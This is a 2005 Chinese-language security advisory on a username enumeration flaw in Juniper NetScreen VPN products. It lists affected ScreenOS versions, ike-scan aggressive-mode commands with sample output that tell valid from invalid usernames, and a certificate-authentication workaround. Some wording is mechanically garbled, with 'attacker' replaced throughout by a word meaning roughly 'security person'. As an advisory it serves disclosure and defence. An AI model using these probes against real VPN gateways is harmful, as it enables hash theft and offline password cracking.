Juniper Netscreen VPN用户名枚举漏洞
来源:岁月联盟
时间:2005-08-20
更新日期:2005-08-19
受影响系统:
Juniper Networks ScreenOS 5.2
Juniper Networks ScreenOS 5.1
Juniper Networks NetScreen-IDP <= 500 3.0.1 r1
Juniper Networks NetScreen-5GT 5.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14595
Netscreen是Juniper提供一系列领先的联网和安全产品之一。
Juniper Netscreen集成的防火墙/VPN产品在为客户执行执行VPN安全测试时存在VPN用户名枚举漏洞,成功利用这个漏洞的安全者可以访问VPN保护的网络资源。
安全者可以使用字典安全判断Netscreen上有效的VPN用户名。一旦发现了用户名,安全者就可以使用这个用户名从Netscreen获得哈希,然后离线破解判断相关的口令。
<*来源:Roy Hills (Roy.Hills@nta-monitor.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112438068426034&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
响应有效的用户名"royhills@hotmail.com"
$Content$nbsp;ike-scan -A -M --id=royhills@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
10.0.0.1 Aggressive Mode Handshake returned
HDR=(CKY-R!af4dbe2cecd5f0)
SA=(Enc=ES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds
LifeDuration(800)
VIDd405f46f03b7660a23be116a1975058e69e83870000000400000403
(Netscreen-05)
VIDH65617274426561745f4e6f74696679386b0100 (Heartbeat Notify)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value.0.0.1)
Hash(20 bytes)
Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1
returned handshake; 0 returned notify
响应无效的用户名"invalid@hotmail.com"
$Content$nbsp;ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0
returned handshake; 0 returned notify
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 使用证书认证而不是预共享密钥认证。
厂商补丁:
Juniper Networks
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.juniper.net/